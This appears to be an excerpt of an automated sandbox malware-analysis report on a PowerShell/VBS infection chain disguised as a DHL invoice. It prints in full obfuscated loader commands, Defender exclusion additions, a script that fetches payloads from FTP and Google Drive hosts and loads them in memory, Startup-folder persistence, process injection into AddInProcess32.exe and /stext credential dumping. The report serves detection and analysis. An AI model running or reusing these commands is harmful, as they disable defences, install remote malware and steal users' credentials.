                    HIPS / PFW / Operating System Protection Evasion

                    Source: Yara matchFile source: amsi64_1928.amsi.csv, type: OTHER
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1800, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1928, type: MEMORYSTR
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $S = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe' ; Add-MpPreference -ExclusionPath $S -force ;
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $S = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe' ; Add-MpPreference -ExclusionPath $S -force ;
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -file "C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\\x11.ps1"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5A
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5A
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5A
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5A
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe protection: execute and read and write
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe protection: execute and read and write
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe protection: execute and read and write
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 401000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 459000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 471000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 477000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 478000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 479000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 47E000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: B77008
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 401000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 459000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 471000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 477000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 478000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 479000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 47E000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: A27008
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 401000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 459000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 471000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 477000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 478000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 479000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 47E000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: DCF008
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 401000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 459000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 471000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 477000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 478000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 479000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 47E000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 69F008
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 401000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 459000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 471000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 477000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 478000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 479000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 47E000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 7C3008
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe23_2_00412132
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_00419662 mouse_event,23_2_00419662
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $qKKzc = 'Ow' + [char]66 + '9ADsAKQAgACkAIAAnAEQAMQ' + [char]66 + 'EACAARAAnACAALAAgAFgAUA' + [char]66 + 'VAHUAaAAkACAALAAgACcAaA' + [char]66 + '0AHQAcA' + [char]66 + 'zADoALwAvAGIAMg' + [char]66 + 'jAGEAcw' + [char]66 + 'lAC4AYw' + [char]66 + 'vAG0ALw' + [char]66 + 'jAGwAYQ' + [char]66 + 'zAHMALg' + [char]66 + '0AHgAdAAnACAAKAAgAF0AXQ' + [char]66 + 'bAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'vAFsAIAAsACAAbA' + [char]66 + 'sAHUAbgAkACAAKA' + [char]66 + 'lAGsAbw' + [char]66 + '2AG4ASQAuACkAIAAnAEkAVg' + [char]66 + 'GAHIAcAAnACAAKA' + [char]66 + 'kAG8AaA' + [char]66 + '0AGUATQ' + [char]66 + '0AGUARwAuACkAJwAxAHMAcw' + [char]66 + 'hAGwAQwAuADMAeQ' + [char]66 + 'yAGEAcg' + [char]66 + 'iAGkATA' + [char]66 + 'zAHMAYQ' + [char]66 + 'sAEMAJwAoAGUAcA' + [char]66 + '5AFQAdA' + [char]66 + 'lAEcALgApACAAWg' + [char]66 + 'jAEIAYw' + [char]66 + 'hACQAIAAoAGQAYQ' + [char]66 + 'vAEwALg' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + '0AG4AZQ' + [char]66 + 'yAHIAdQ' + [char]66 + 'DADoAOg' + [char]66 + 'dAG4AaQ' + [char]66 + 'hAG0Abw' + [char]66 + 'EAHAAcA' + [char]66 + '' + [char]66 + 'AC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwA7ACkAIAApACAAJw' + [char]66 + '' + [char]66 + 'ACcAIAAsACAAJwCTIToAkyEnACAAKA' + [char]66 + 'lAGMAYQ' + [char]66 + 'sAHAAZQ' + [char]66 + 'SAC4AZw' + [char]66 + 'TAHoAQw' + [char]66 + 'CAGwAJAAgACgAZw' + [char]66 + 'uAGkAcg' + [char]66 + '0AFMANAA2AGUAcw' + [char]66 + 'hAEIAbQ' + [char]66 + 'vAHIARgA6ADoAXQ' + [char]66 + '0AHIAZQ' + [char]66 + '2AG4Abw' + [char]66 + 'DAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'aAGMAQg' + [char]66 + 'jAGEAJAAgAF0AXQ' + [char]66 + 'bAGUAdA' + [char]66 + '5AEIAWwA7ACcAJQ' + [char]66 + 'JAGgAcQ' + [char]66 + 'SAFgAJQAnACAAPQAgAFgAUA' + [char]66 + 'VAHUAaAAkADsAKQAgAGcAUw' 
 + [char]66 + '6AEMAQg' + [char]66 + 'sACQAIAAoAGcAbg' + [char]66 + 'pAHIAdA' + [char]66 + 'TAGQAYQ' + [char]66 + 'vAGwAbg' + [char]66 + '3AG8ARAAuAHoAeA' + [char]66 + 'iAGsAbQAkACAAPQAgAGcAUw' + [char]66 + '6AEMAQg' + [char]66 + 'sACQAOwA4AEYAVA' + [char]66 + 'VADoAOg' + [char]66 + 'dAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAuAHQAeA' + [char]66 + 'lAFQALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bACAAPQAgAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAuAHoAeA' + [char]66 + 'iAGsAbQAkADsAKQ' + [char]66 + '0AG4AZQ' + [char]66 + 'pAGwAQw' + [char]66 + 'iAGUAVwAuAHQAZQ' + [char]66 + 'OACAAdA' + [char]66 + 'jAGUAag' + [char]66 + 'iAE8ALQ' + [char]66 + '3AGUATgAoACAAPQAgAHoAeA' + [char]66 + 'iAGsAbQAkADsAKQAoAGUAcw' + [char]66 + 'vAHAAcw' + [char]66 + 'pAGQALg' + [char]66 + '6AHgAYg' + [char]66 + 'rAG0AJAA7ACkAIAAnAHQAeA' + [char]66 + '0AC4AMQAwAEwATA' + [char]66 + 'EAC8AMQAwAC8Acg' + [char]66 + 'lAHQAcA' + [char]66 + '5AHIAYw' + [char]66 + 'wAFUALw' + [char]66 + 'yAGIALg' + [char]66 + 'tAG8AYwAuAHQAYQ' + [char]66 + 'yAGIAdg' + [ch
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $QDrfV = $host.Version.Major.Equals(2) ;if ( $QDrfV ) {$TZWou = [System.IO.Path]::GetTempPath();del ( $TZWou + '\Upwin.msu' );$rrlqq = 'https://drive.google.com/uc?export=download&id=';$qVgWD = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVgWD ) {$rrlqq = ($rrlqq + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$rrlqq = ($rrlqq + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$yzdrg = (New-Object Net.WebClient);$yzdrg.Encoding = [System.Text.Encoding]::UTF8;$yzdrg.DownloadFile($URLKB, $TZWou + '\Upwin.msu');$mcYDf = ('C:\Users\' + [Environment]::UserName );tkplB = ($TZWou + '\Upwin.msu'); powershell.exe wusa.exe tkplB /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\DHLShippingInvoicesAwbBL000000000102220242247.vbs' -Destination ( $mcYDf + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$mkbxz = (New-Object Net.WebClient);$mkbxz.Encoding = [System.Text.Encoding]::UTF8;$mkbxz.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),(-join [char[]](66, 70, 119, 71 ,121 ,97 ,85,66,77,89,49,53,55,56,64,64 )));$lBCzSg = $mkbxz.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$mkbxz.dispose();$mkbxz = (New-Object Net.WebClient);$mkbxz.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $mkbxz.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\DHLShippingInvoicesAwbBL000000000102220242247.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' 
 , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.ssalc/moc.esac2b//:sptth' , $huUPX , 'D D1D' ) );};"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1' ";exit
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\user\AppData\Local\Temp\qpqzbrslzlqmxxqwczcuhtgf"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\user\AppData\Local\Temp\qpqzbrslzlqmxxqwczcuhtgf"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\user\AppData\Local\Temp\ajvsujdnntiralmilkxwkxswwkf"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\user\AppData\Local\Temp\lladutngjbaekramcnkpuknfxzxbri"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1' ";exit
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1' ";exit
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1' ";exit
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $qkkzc = 'ow' + [char]66 + '9adsakqagackaiaanaeqamq' + [char]66 + 'eacaaraanacaalaagafgaua' + [char]66 + 'vahuaaaakacaalaagaccaaa' + [char]66 + '0ahqaca' + [char]66 + 'zadoalwavagiamg' + [char]66 + 'jageacw' + [char]66 + 'lac4ayw' + [char]66 + 'vag0alw' + [char]66 + 'jagwayq' + [char]66 + 'zahmalg' + [char]66 + '0ahgadaanacaakaagaf0axq' + [char]66 + 'bahqayw' + [char]66 + 'lagoayg' + [char]66 + 'vafsaiaasacaaba' + [char]66 + 'sahuabgakacaaka' + [char]66 + 'lagsabw' + [char]66 + '2ag4asqauackaiaanaekavg' + [char]66 + 'gahiacaanacaaka' + [char]66 + 'kag8aaa' + [char]66 + '0aguatq' + [char]66 + '0aguarwauackajwaxahmacw' + [char]66 + 'hagwaqwauadmaeq' + [char]66 + 'yageacg' + [char]66 + 'iagkata' + [char]66 + 'zahmayq' + [char]66 + 'saemajwaoaguaca' + [char]66 + '5afqada' + [char]66 + 'laecalgapacaawg' + [char]66 + 'jaeiayw' + [char]66 + 'hacqaiaaoagqayq' + [char]66 + 'vaewalg' + [char]66 + 'uagkayq' + [char]66 + 'tag8ara' + [char]66 + '0ag4azq' + [char]66 + 'yahiadq' + [char]66 + 'dadoaog' + [char]66 + 'dag4aaq' + [char]66 + 'hag0abw' + [char]66 + 'eahaaca' + [char]66 + '' + [char]66 + 'ac4abq' + [char]66 + 'lahqacw' + [char]66 + '5afmawwa7ackaiaapacaajw' + [char]66 + '' + [char]66 + 'accaiaasacaajwctitoakyenacaaka' + [char]66 + 'lagmayq' + [char]66 + 'sahaazq' + [char]66 + 'sac4azw' + [char]66 + 'tahoaqw' + [char]66 + 'cagwajaagacgazw' + [char]66 + 'uagkacg' + [char]66 + '0afmanaa2aguacw' + [char]66 + 'haeiabq' + [char]66 + 'vahiarga6adoaxq' + [char]66 + '0ahiazq' + [char]66 + '2ag4abw' + [char]66 + 'dac4abq' + [char]66 + 'lahqacw' + [char]66 + '5afmawwagad0aia' + [char]66 + 'aagmaqg' + [char]66 + 'jageajaagaf0axq' + [char]66 + 'baguada' + [char]66 + '5aeiawwa7accajq' + [char]66 + 'jaggacq' + [char]66 + 'safgajqanacaapqagafgaua' + [char]66 + 'vahuaaaakadsakqagagcauw' 
+ [char]66 + '6aemaqg' + [char]66 + 'sacqaiaaoagcabg' + [char]66 + 'pahiada' + [char]66 + 'tagqayq' + [char]66 + 'vagwabg' + [char]66 + '3ag8araauahoaea' + [char]66 + 'iagsabqakacaapqagagcauw' + [char]66 + '6aemaqg' + [char]66 + 'sacqaowa4aeyava' + [char]66 + 'vadoaog' + [char]66 + 'dagcabg' + [char]66 + 'pagqabw' + [char]66 + 'jag4arqauahqaea' + [char]66 + 'lafqalg' + [char]66 + 'taguada' + [char]66 + 'zahkauw' + [char]66 + 'bacaapqagagcabg' + [char]66 + 'pagqabw' + [char]66 + 'jag4arqauahoaea' + [char]66 + 'iagsabqakadsakq' + [char]66 + '0ag4azq' + [char]66 + 'pagwaqw' + [char]66 + 'iaguavwauahqazq' + [char]66 + 'oacaada' + [char]66 + 'jaguaag' + [char]66 + 'iae8alq' + [char]66 + '3aguatgaoacaapqagahoaea' + [char]66 + 'iagsabqakadsakqaoaguacw' + [char]66 + 'vahaacw' + [char]66 + 'pagqalg' + [char]66 + '6ahgayg' + [char]66 + 'rag0ajaa7ackaiaanahqaea' + [char]66 + '0ac4amqawaewata' + [char]66 + 'eac8amqawac8acg' + [char]66 + 'lahqaca' + [char]66 + '5ahiayw' + [char]66 + 'wafualw' + [char]66 + 'yagialg' + [char]66 + 'tag8aywauahqayq' + [char]66 + 'yagiadg' + [ch
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "; $qdrfv = $host.version.major.equals(2) ;if ( $qdrfv ) {$tzwou = [system.io.path]::gettemppath();del ( $tzwou + '\upwin.msu' );$rrlqq = 'https://drive.google.com/uc?export=download&id=';$qvgwd = $env:processor_architecture.contains('64') ;if ( $qvgwd ) {$rrlqq = ($rrlqq + '1naqdnxigvi_q1rpkazftmygmaqtjxu42') ;}else {$rrlqq = ($rrlqq + '1g1jmxusx9mc9vmhvrjj2xofz3ak_clot') ;};$yzdrg = (new-object net.webclient);$yzdrg.encoding = [system.text.encoding]::utf8;$yzdrg.downloadfile($urlkb, $tzwou + '\upwin.msu');$mcydf = ('c:\users\' + [environment]::username );tkplb = ($tzwou + '\upwin.msu'); powershell.exe wusa.exe tkplb /quiet /norestart ; copy-item 'c:\users\user\desktop\dhlshippinginvoicesawbbl000000000102220242247.vbs' -destination ( $mcydf + '\appdata\roaming\microsoft\windows\start menu\programs\startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[system.net.servicepointmanager]::servercertificatevalidationcallback = {$true};[system.net.servicepointmanager]::securityprotocol = [system.net.securityprotocoltype]::tls12;$lbczsg;$mkbxz = (new-object net.webclient);$mkbxz.encoding = [system.text.encoding]::utf8;$mkbxz.credentials = new-object system.net.networkcredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),(-join [char[]](66, 70, 119, 71 ,121 ,97 ,85,66,77,89,49,53,55,56,64,64 )));$lbczsg = $mkbxz.downloadstring( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/upcrypter/01/dll01.txt' );$mkbxz.dispose();$mkbxz = (new-object net.webclient);$mkbxz.encoding = [system.text.encoding]::utf8;$lbczsg = $mkbxz.downloadstring( $lbczsg );$huupx = 'c:\users\user\desktop\dhlshippinginvoicesawbbl000000000102220242247.vbs';[byte[]] $acbcz = [system.convert]::frombase64string( $lbczsg.replace( '?:?' 
, 'a' ) );[system.appdomain]::currentdomain.load( $acbcz ).gettype('classlibrary3.class1').getmethod( 'prfvi' ).invoke( $null , [object[]] ( 'txt.ssalc/moc.esac2b//:sptth' , $huupx , 'd d1d' ) );};"
                    Source: unknownProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c start /min "" powershell.exe -windowstyle hidden -executionpolicy bypass -command ". 'c:\users\user\appdata\roaming\program rules nvideo\update drivers nvideo\update drivers nvideo\update drivers nvideo\qkbrq.ps1' ";exit
                    Source: unknownProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c start /min "" powershell.exe -windowstyle hidden -executionpolicy bypass -command ". 'c:\users\user\appdata\roaming\program rules nvideo\update drivers nvideo\update drivers nvideo\update drivers nvideo\qkbrq.ps1' ";exit
                    Source: unknownProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c start /min "" powershell.exe -windowstyle hidden -executionpolicy bypass -command ". 'c:\users\user\appdata\roaming\program rules nvideo\update drivers nvideo\update drivers nvideo\update drivers nvideo\qkbrq.ps1' ";exit
